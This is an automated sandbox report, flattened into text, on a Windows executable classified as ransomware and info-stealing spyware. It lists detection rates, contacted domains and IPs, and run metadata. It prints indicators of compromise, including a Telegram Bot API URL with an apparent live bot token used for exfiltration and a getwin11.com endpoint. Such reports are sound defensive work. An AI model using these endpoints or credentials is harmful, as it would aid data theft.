   54 conhost.exe 37->54         started        process13 dnsIp14 88 play.google.com 142.250.185.238, 443, 49753, 49756 GOOGLEUS United States 39->88 90 plus.l.google.com 142.250.186.46, 443, 49748 GOOGLEUS United States 39->90 92 2 other IPs or domains 39->92

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                bc7EKCf.exe32%VirustotalBrowse
                bc7EKCf.exe34%ReversingLabs
                bc7EKCf.exe100%AviraHEUR/AGEN.1311150
                bc7EKCf.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://getwin11.com/asd.php0%Avira URL Cloudsafe
                http://getwin11.com0%Avira URL Cloudsafe
                http://icanhazip.comT0%Avira URL Cloudsafe
                http://icanhazip.comd0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                fg.microsoft.map.fastly.net
                199.232.214.172
                truefalse
                  high
                  bg.microsoft.map.fastly.net
                  199.232.210.172
                  truefalse
                    high
                    chrome.cloudflare-dns.com
                    162.159.61.3
                    truefalse
                      high
                      getwin11.com
                      80.78.22.111
                      truefalse
                        unknown
                        plus.l.google.com
                        142.250.186.46
                        truefalse
                          high
                          play.google.com
                          142.250.185.238
                          truefalse
                            high
                            sb.scorecardresearch.com
                            18.244.18.27
                            truefalse
                              high
                              s-part-0017.t-0009.t-msedge.net
                              13.107.246.45
                              truefalse
                                high
                                www.google.com
                                216.58.206.68
                                truefalse
                                  high
                                  api.telegram.org
                                  149.154.167.220
                                  truefalse
                                    high
                                    googlehosted.l.googleusercontent.com
                                    142.250.185.193
                                    truefalse
                                      high
                                      icanhazip.com
                                      104.16.185.241
                                      truefalse
                                        high
                                        assets.msn.com
                                        unknown
                                        unknownfalse
                                          high
                                          c.msn.com
                                          unknown
                                          unknownfalse
                                            high
                                            ntp.msn.com
                                            unknown
                                            unknownfalse
                                              high
                                              clients2.googleusercontent.com
                                              unknown
                                              unknownfalse
                                                high
                                                bzib.nelreports.net
                                                unknown
                                                unknownfalse
                                                  high
                                                  apis.google.com
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    api.msn.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      NameMaliciousAntivirus DetectionReputation
                                                      https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416767246&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                        high
                                                        https://api.telegram.org/bot7831867283:AAEopA7q0c646Jx2HXjB55s1f-y8Uh1Ze0I/getMefalse
                                                          high
                                                          http://getwin11.com/asd.phpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://icanhazip.com/false
                                                            high
                                                            https://sb.scorecardresearch.com/b2?rn=1736416763900&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0F21C4DE7A1B6788277DD1B17BB36680&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                              high
                                                              https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416766249&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                high
                                                                https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1736416766247&w=0&anoncknm=app_anon&NoResponseBody=truefalse
                                                                  high
                                                                  https://sb.scorecardresearch.com/b?rn=1736416763900&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=0F21C4DE7A1B6788277DD1B17BB36680&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*nullfalse
                                                                    high
                                                                    https://c.msn.com/c.gif?rnd=1736416763899&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=b22f4747dbd8407584046bcaed3aa480&activityId=b22f4747dbd8407584046bcaed3aa480&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=0125A3251C5C420C9BB6786682DD1947&MUID=0F21C4DE7A1B6788277DD1B17BB36680false
                                                                      high
                                                                      https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                                        high
                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        https://duckduckgo.com/chrome_newtabtmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drfalse
                                                                          high
                                                                          https://duckduckgo.com/ac/?q=tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drfalse
                                                                            high
                                                                            https://ntp.msn.com/0000003.log.14.drfalse
                                                                              high
                                                                              https://ntp.msn.com/_defaultQuotaManager.14.drfalse
                                                                                high
                                                                                http://www.fontbureau.com/designersbc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://deff.nelreports.net/api/report?cat=msnReporting and NEL.14.drfalse
                                                                                    high
                                                                                    https://ntp.msn.cn/edge/ntp2cc80dabc69f58b6_1.14.drfalse
                                                                                      high
                                                                                      http://getwin11.combc7EKCf.exe, 00000002.00000002.1976480263.0000000003331000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.000000000324F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://docs.google.com/manifest.json0.14.drfalse
                                                                                        high
                                                                                        https://www.youtube.comec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                          high
                                                                                          https://www.instagram.comec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                            high
                                                                                            http://www.galapagosdesign.com/DPleasebc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedgeec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                high
                                                                                                https://outlook.office.com/mail/compose?isExtension=trueec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                  high
                                                                                                  http://icanhazip.combc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://www.zhongyicts.com.cnbc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namebc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://i.y.qq.com/n2/m/index.htmlec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                          high
                                                                                                          https://www.deezer.com/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                            high
                                                                                                            https://github.com/LimerBoy/StormKitty0&fqbc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://web.telegram.org/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                high
                                                                                                                https://cdnjs.cloudflare.com/ajax/libs/mathjax/offscreendocument_main.js.14.dr, service_worker_bin_prod.js.14.drfalse
                                                                                                                  high
                                                                                                                  https://drive-daily-2.corp.google.com/manifest.json0.14.drfalse
                                                                                                                    high
                                                                                                                    https://unitedstates1.ss.wd.microsoft.us/edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1.14.drfalse
                                                                                                                      high
                                                                                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drfalse
                                                                                                                        high
                                                                                                                        https://www.ecosia.org/newtab/tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.drfalse
                                                                                                                          high
                                                                                                                          https://drive-daily-1.corp.google.com/manifest.json0.14.drfalse
                                                                                                                            high
                                                                                                                            https://excel.new?from=EdgeM365Shorelineec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                              high
                                                                                                                              https://drive-daily-5.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                high
                                                                                                                                http://www.carterandcone.comlbc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://plus.google.comchromecache_593.8.drfalse
                                                                                                                                    high
                                                                                                                                    https://bzib.nelreports.net/api/report?cat=bingbusinessReporting and NEL.14.drfalse
                                                                                                                                      high
                                                                                                                                      https://chromewebstore.google.com/manifest.json.14.drfalse
                                                                                                                                        high
                                                                                                                                        https://drive-preprod.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                          high
                                                                                                                                          https://srtb.msn.cn/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                            high
                                                                                                                                            https://msn.comXIDv10Cookies.15.drfalse
                                                                                                                                              high
                                                                                                                                              https://chrome.google.com/webstore/manifest.json.14.drfalse
                                                                                                                                                high
                                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesbc7EKCf.exe, 00000002.00000002.1985383738.0000000004226000.00000004.00000800.00020000.00000000.sdmp, tmp478F.tmp.dat.2.dr, tmp477E.tmp.dat.2.drfalse
                                                                                                                                                  high
                                                                                                                                                  http://api.telegram.orgbc7EKCf.exe, 00000002.00000002.1976480263.0000000003419000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://bard.google.com/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://assets.msn.cn/resolver/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://browser.events.data.msn.com/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                          high
                                                                                                                                                          http://www.founder.com.cn/cn/bThebc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.office.comec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://outlook.live.com/mail/0/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://ntp.msn.com/edge/ntp000003.log.14.dr, 2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://assets.msn.com/resolver/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://tidal.com/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://ntp.msn.com000003.log2.14.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://github.com/dotnet/runtimebc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2012775385.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2010931634.0000000008420000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2009256026.0000000007FB0000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1999064795.0000000006650000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.typography.netDbc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://gaana.com/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://aka.ms/dotnet-warnings/bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://icanhazip.comTbc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                unknown
                                                                                                                                                                                https://outlook.live.com/mail/compose?isExtension=trueec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://aka.ms/serializationformat-binary-obsoletebc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://aka.ms/binaryformatterbc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://www.fonts.combc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://www.sandoll.co.krbc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://outlook.office.com/calendar/view/agenda/quickcapture/moreDetails?isExtension=trueec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://apis.google.comchromecache_590.8.dr, chromecache_593.8.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://domains.google.com/suggest/flowchromecache_593.8.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://github.com/JamesNK/Newtonsoft.Jsonbc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://latest.web.skype.com/?browsername=edge_canary_shorelineec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://word.new?from=EdgeM365Shorelineec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icotmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        http://icanhazip.comtbc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://mail.google.com/mail/mu/mp/266/#tl/Inboxec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://drive-autopush.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://outlook.office.com/mail/inbox?isExtension=true&sharedHeader=1&client_flight=outlookedgeec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://github.com/StephenCleary/Disposablesbc7EKCf.exe, 00000002.00000002.1995301685.00000000056E0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://open.spotify.comec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://twitter.com/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      http://icanhazip.comdbc7EKCf.exe, 00000002.00000002.1976480263.0000000003339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                                                                                      unknown
                                                                                                                                                                                                                      https://m.vk.com/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://www.fontbureau.com/designers/cabarga.htmlNbc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          http://www.founder.com.cn/cnbc7EKCf.exe, 00000000.00000002.1813048969.0000000007262000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            https://drive-daily-6.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              https://drive-daily-0.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://www.iheart.com/podcast/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://music.yandex.comec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://clients2.googleusercontent.com23be4805-ca70-4593-b6ee-9bc67407429b.tmp.15.drfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://drive-daily-3.corp.google.com/manifest.json0.14.drfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        https://c.msn.com/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          http://www.broofa.comchromecache_590.8.drfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://api.telegram.org/botbc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshorelineec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://www.last.fm/ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://github.com/StephenCleary/AsyncExbc7EKCf.exe, 00000002.00000002.1976369045.00000000030B0000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976402820.00000000030C0000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://sb.scorecardresearch.com/2cc80dabc69f58b6_1.14.drfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                      142.250.186.46
                                                                                                                                                                                                                                                      plus.l.google.comUnited States
                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                      18.244.18.27
                                                                                                                                                                                                                                                      sb.scorecardresearch.comUnited States
                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                      18.238.49.74
                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                      16509AMAZON-02USfalse
                                                                                                                                                                                                                                                      149.154.167.220
                                                                                                                                                                                                                                                      api.telegram.orgUnited Kingdom
                                                                                                                                                                                                                                                      62041TELEGRAMRUfalse
                                                                                                                                                                                                                                                      162.159.61.3
                                                                                                                                                                                                                                                      chrome.cloudflare-dns.comUnited States
                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                      20.110.205.119
                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                      204.79.197.219
                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                      172.64.41.3
                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                      20.42.65.93
                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                                                      104.70.121.211
                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                      20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                      142.250.185.238
                                                                                                                                                                                                                                                      play.google.comUnited States
                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                      104.70.121.217
                                                                                                                                                                                                                                                      unknownUnited States
                                                                                                                                                                                                                                                      20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                                                                      216.58.206.68
                                                                                                                                                                                                                                                      www.google.comUnited States
                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                      142.250.185.193
                                                                                                                                                                                                                                                      googlehosted.l.googleusercontent.comUnited States
                                                                                                                                                                                                                                                      15169GOOGLEUSfalse
                                                                                                                                                                                                                                                      239.255.255.250
                                                                                                                                                                                                                                                      unknownReserved
                                                                                                                                                                                                                                                      unknownunknownfalse
                                                                                                                                                                                                                                                      80.78.22.111
                                                                                                                                                                                                                                                      getwin11.comCyprus
                                                                                                                                                                                                                                                      37560CYBERDYNELRfalse
                                                                                                                                                                                                                                                      104.16.185.241
                                                                                                                                                                                                                                                      icanhazip.comUnited States
                                                                                                                                                                                                                                                      13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                      IP
                                                                                                                                                                                                                                                      192.168.2.4
                                                                                                                                                                                                                                                      127.0.0.1
                                                                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                      Analysis ID:1586583
                                                                                                                                                                                                                                                      Start date and time:2025-01-09 10:58:07 +01:00
                                                                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                      Overall analysis duration:0h 8m 9s
                                                                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                      Number of analysed new started processes analysed:32
                                                                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                                                                      Sample name:bc7EKCf.exe
                                                                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                                                                      Classification:mal100.rans.troj.spyw.evad.winEXE@79/456@29/19
                                                                                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                                                                      • Successful, ratio: 99%
                                                                                                                                                                                                                                                      • Number of executed functions: 566
                                                                                                                                                                                                                                                      • Number of non-executed functions: 10
                                                                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                                                                      • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.186.35, 216.58.206.46, 64.233.184.84, 142.250.185.78, 142.250.186.67, 142.250.185.174, 142.250.186.74, 142.250.186.106, 142.250.185.202, 142.250.74.202, 216.58.212.170, 216.58.212.138, 142.250.181.234, 142.250.184.202, 142.250.186.138, 172.217.16.138, 142.250.186.42, 142.250.185.138, 142.250.185.234, 142.250.186.170, 216.58.206.74, 142.250.185.74, 4.245.163.56, 199.232.210.172, 192.229.221.95, 20.3.187.198, 13.107.42.16, 204.79.197.203, 204.79.197.239, 13.107.21.239, 142.250.186.174, 13.107.6.158, 2.19.126.143, 2.19.126.152, 4.209.164.61, 2.18.64.218, 2.18.64.203, 2.23.227.208, 2.23.227.221, 2.23.227.205, 2.23.227.202, 2.23.227.215, 2.23.209.3, 2.23.209.5, 2.23.209.7, 2.23.209.19, 2.23.209.17, 2.23.209.15, 2.23.209.9, 2.23.209.12, 2.23.209.16, 13.74.129.1, 13.107.21.237, 204.79.197.237, 2.16.168.122, 2.16.168.115, 2.21.65.154, 2.21.65.132, 108.141.15.7, 20.12.23.50, 142.251.40.131, 142.250.72.99, 142.250.80.3, 184.28.90.27, 40.126.24.84, 13.107.246.45, 104.117
                                                                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): cdp-f-ssl-tlu-net.trafficmanager.net, nav-edge.smartscreen.microsoft.com, slscr.update.microsoft.com, a416.dscd.akamai.net, img-s-msn-com.akamaized.net, data-edge.smartscreen.microsoft.com, prod-agic-we-6.westeurope.cloudapp.azure.com, clientservices.googleapis.com, edgeassetservice.afd.azureedge.net, star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, login.live.com, config-edge-skype.l-0007.l-msedge.net, www.gstatic.com, l-0007.l-msedge.net, wu-b-net.trafficmanager.net, e28578.d.akamaiedge.net, star.b.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, c-bing-com.dual-a-0034.a-msedge.net, ogads-pa.googleapis.com, prod-atm-wds-edge.trafficmanager.net, www.googleapis.com, www-www.bing.com.trafficmanager.net, business-bing-com.b-0005.b-msedge.net, a1834.dscg2.akamai.net, c.bing.com, edgeassetservice.azureedge.net, clients
                                                                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtQueryVolumeInformationFile calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
